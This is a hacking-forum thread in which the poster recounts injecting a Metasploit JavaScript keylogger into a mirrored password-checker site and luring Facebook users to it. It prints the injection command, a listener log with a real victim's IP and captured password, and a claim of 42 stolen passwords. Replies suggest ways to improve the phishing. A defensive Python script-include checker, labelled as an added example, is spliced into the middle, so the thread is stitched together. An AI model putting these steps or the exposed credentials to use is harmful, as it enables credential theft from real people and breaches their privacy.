EvilZone, Hacking and Security board. Posted by z3ro, August 06, 2012, 03:38:24 PM
-
Although I had discovered the http_javascript_keylogger quite a long time ago, it's only recently that I found a rather effective way of using it: using it to harvest passwords.
Synopsis
-First, I used httrack to mirror the entire website http://howsecureismypassword.net/ onto my computer.
root@z3ro:~# httrack http://howsecureismypassword.net/
Mirror launched on Mon, 12 Aug 2012 17:10:19 by HTTrack Website Copier/3.43-9+libhtsjava.so.2 [XR&CO'2010]
mirroring http://howsecureismypassword.net/ with the wizard help..
Done.: howsecureismypassword.net/assets/fonts/League_Gothic-webfont.svg (27651 bytes) - OK
Thanks for using HTTrack!
-Next, I injected the javascript keylogger into the web page I had just copied.
root@z3ro:~# echo "<script type=\"text/javascript\" src=\"http://$IP:8081/log/NNRtKZNlErTh.js\"></script>" >> /var/www/howsecureismypassword.net/index.html
-I then hosted the website on my computer using lighttpd and started the metasploit listener on port 8081. With my lighttpd running on port 80 and metasploit on port 8081, I forwarded the respective ports to make my website available from the internet.
-Everything was set on my side; I now only needed a 'victim'. And Facebook proved to offer many.
-Convincing someone to 'check out' the website proved to be easier than expected.
Here's a preview from my last target:
Starting Metasploit
[*] Please wait while we load the module tree...
=[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 916 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
demo => true
srvhost => 192.168.1.2
srvport => 8081
uripath => log
[*] Listening on 192.168.1.2:8081...
[*] Using URL: http://192.168.1.2:8081/log
[*] Server started.
[*] 197.225.238.119 http_javascript_keylogger - Assigning client identifier '0779c624'
[+] [0779c624] Logging clean keystrokes to: /root/.msf4/loot/20120805194327_default_197.225.238.119_browser.keystrok_771244.txt
[+] [0779c624] Logging raw keystrokes to: /root/.msf4/loot/20120805194330_default_197.225.238.119_browser.keystrok_134192.txt
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: me
[+] [0779c624] Keys: m
[+] [0779c624] Keys: p
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: password
[+] [0779c624] Keys: passwor
[+] [0779c624] Keys: passwo
[+] [0779c624] Keys: passw
[+] [0779c624] Keys: pass
[+] [0779c624] Keys: pas
[+] [0779c624] Keys: pa
[+] [0779c624] Keys: p
[+] [0779c624] Keys: m
[+] [0779c624] Keys: me
[+] [0779c624] Keys: mei
[+] [0779c624] Keys: mein
[+] [0779c624] Keys: meint
[+] [0779c624] Keys: meinte
[+] [0779c624] Keys: meinter
[+] [0779c624] Keys: meintera
[+] [0779c624] Keys: meinteraa
[+] [0779c624] Keys: meinteraam
[+] [0779c624] Keys: meinteraamp
[+] [0779c624] Keys: meinteraampl
[+] [0779c624] Keys: meinteraampli
[+] [0779c624] Keys: meinteraamplif
[+] [0779c624] Keys: meinteraamplifi
[+] [0779c624] Keys: meinteraamplifie
[+] [0779c624] Keys: meinteraamplifier
[+] [0779c624] Keys: meinteraamplifier<CR>
[+] [0779c624] Keys: j
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckayshal
[+] [0779c624] Keys: jrastameckaysha
[+] [0779c624] Keys: jrastameckaysh
[+] [0779c624] Keys: jrastameckays
[+] [0779c624] Keys: jrastameckay
[+] [0779c624] Keys: jrastamecka
[+] [0779c624] Keys: jrastameck
[+] [0779c624] Keys: jrastamec
[+] [0779c624] Keys: jrastame
[+] [0779c624] Keys: jrastam
[+] [0779c624] Keys: jrasta
[+] [0779c624] Keys: jrast
[+] [0779c624] Keys: jras
[+] [0779c624] Keys: jra
[+] [0779c624] Keys: jr
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4ev4
[+] [0779c624] Keys: j0ksh4sh4l4ev
[+] [0779c624] Keys: j0ksh4sh4l4e
[+] [0779c624] Keys: j0ksh4sh4l4
[+] [0779c624] Keys: j0ksh4sh4l
[+] [0779c624] Keys: j0ksh4sh4
[+] [0779c624] Keys: j0ksh4sh
[+] [0779c624] Keys: j0ksh4s
[+] [0779c624] Keys: j0ksh4
[+] [0779c624] Keys: j0ksh
[+] [0779c624] Keys: j0ks
[+] [0779c624] Keys: j0k
[+] [0779c624] Keys: j
[+] [0779c624] Keys: j0
[+] [0779c624] Keys: w
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a star
[+] [0779c624] Keys: wish up0n a sta
[+] [0779c624] Keys: wish up0n a st
[+] [0779c624] Keys: wish up0n a s
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n a
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0n
[+] [0779c624] Keys: wish up0
[+] [0779c624] Keys: wish up
[+] [0779c624] Keys: wish u
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wish
[+] [0779c624] Keys: wis
[+] [0779c624] Keys: wi
[+] [0779c624] Keys: w
[+] [0779c624] Keys: a
[+] [0779c624] Keys: am
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ieo
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'ie
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'i
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b'
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/b
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe/
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvhe
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbvh
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlbv
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rl
[+] [0779c624] Keys: amhgwsdkj.cedvhe/rlb
[+] [0779c624] Keys: amhgwsdkj.cedvhe/r
[+] [0779c624] Keys: amhgwsdkj.cedvhe/
[+] [0779c624] Keys: amhgwsdkj.cedv
[+] [0779c624] Keys: amhgwsdkj.cedvhe
[+] [0779c624] Keys: amhgwsdkj.ced
[+] [0779c624] Keys: amhgwsdkj.cedvh
[+] [0779c624] Keys: amhgwsdkj.c
[+] [0779c624] Keys: amhgwsdkj.ce
[+] [0779c624] Keys: amhgwsdkj.
[+] [0779c624] Keys: amhgwsdkj
[+] [0779c624] Keys: amhgwsdk
[+] [0779c624] Keys: amhgwsd
[+] [0779c624] Keys: amhgws
[+] [0779c624] Keys: amhgw
[+] [0779c624] Keys: amhg
[+] [0779c624] Keys: amh
[+] [0779c624] Keys: am
[+] [0779c624] Keys: a
[+] [0779c624] Keys: ab
[+] [0779c624] Keys: a
[+] [0779c624] Keys: abc
[+] [0779c624] Keys: abcd
[+] [0779c624] Keys: abcde
[+] [0779c624] Keys: abcdef
[+] [0779c624] Keys: abcdefg
[+] [0779c624] Keys: abcdefgh
[+] [0779c624] Keys: abcdefghi
[+] [0779c624] Keys: abcdefghij
[+] [0779c624] Keys: abcdefghijk
[+] [0779c624] Keys: abcdefghijkl
[+] [0779c624] Keys: abcdefghijklm
[+] [0779c624] Keys: abcdefghijklmn
[+] [0779c624] Keys: abcdefghijklmno
[+] [0779c624] Keys: abcdefghijklmnop
[+] [0779c624] Keys: abcdefghijklmnopq
[+] [0779c624] Keys: abcdefghijklmnopqr
[+] [0779c624] Keys: abcdefghijklmnopqrs
[+] [0779c624] Keys: abcdefghijklmnopqrst
[+] [0779c624] Keys: abcdefghijklmnopqrstu
[+] [0779c624] Keys: abcdefghijklmnopqrstuv
[+] [0779c624] Keys: abcdefghijklmnopqrstuvw
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwx
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxy
[+] [0779c624] Keys: abcdefghijklmnopqrstuvwxyz
That's it. His password was actually meinteraamplifier and although the guy seemed to have enjoyed typing 'what-ever-he-felt-like-typing', I did get his passwd!
I have over 42 passwords now and I've concluded a success rate of about 87%.
The human weakness factor is so much easier to penetrate than the network or server weaknesses. The attack is plain and simple, with no known problems with AVs.
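The injection step above appends a `<script>` tag that loads from a raw IP address and a non-standard port, which is the artifact a defender would look for when checking whether a page (a mirrored copy, a hosted site, or a saved phishing sample) has had a third-party script added to it. The following is an added example, not code from the post or from Metasploit: it parses an HTML document, collects every external script source, and reports the ones whose host is an IP literal or does not match the host the page claims to be served from. The sample HTML, the IP `203.0.113.5` and the script path are constructed placeholders.

```python
"""Flag <script src=...> includes that do not come from the page's own host.

Added example (not the original poster's code). Relative sources and sources on
the page's own host are treated as expected; everything else is reported with a
reason, so an injected include pointing at an IP:port listener stands out.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def is_ip_literal(host):
    """True if host is a bare IPv4/IPv6 address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_script_sources(html_text, page_host):
    """Return [(src, reason)] for scripts not served from page_host.

    reason is "ip-literal" (host is a bare IP) or "foreign-host" (a DNS name
    other than page_host). Relative URLs resolve to the page's own origin and
    are not reported.
    """
    parser = ScriptSrcCollector()
    parser.feed(html_text)
    findings = []
    for src in parser.sources:
        host = urlparse(src).hostname  # None for relative URLs
        if host is None or host.lower() == page_host.lower():
            continue
        reason = "ip-literal" if is_ip_literal(host) else "foreign-host"
        findings.append((src, reason))
    return findings


# Constructed sample: a mirrored page with its own script, plus an include
# appended after </html> the way `echo ... >> index.html` would leave it.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>sample</title>
<script src="assets/js/app.js"></script>
</head><body><p>constructed sample page</p></body></html>
<script type="text/javascript" src="http://203.0.113.5:8081/log/PLACEHOLDER.js"></script>
"""

if __name__ == "__main__":
    for src, reason in classify_script_sources(SAMPLE_HTML, "howsecureismypassword.net"):
        print(f"{reason}: {src}")
```

Run against a directory of saved pages, the check is a cheap first pass: a script include that resolves to an IP literal on an unusual port has no business in a static site copy, and a `foreign-host` hit is worth comparing against the site's known CDN or analytics hosts before it is dismissed.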
-
The method can be very effective and you played this off well. The only thing I would change is the site you mirrored. A place to get email addresses and/or user names would be good too. I don't see a lot of people, especially smart people, putting in their actual password. A lot of people know how to make secure passwords already.
Maybe a site that uses a Facebook login would be good. Also, checking the URL could stop would-be key logs.
Overall good job, it's a great start.
-
I don't get the point why you would use Metasploit for that. That will raise firewalls :).
You can write an AJAX script that logs everything into a database or text file :D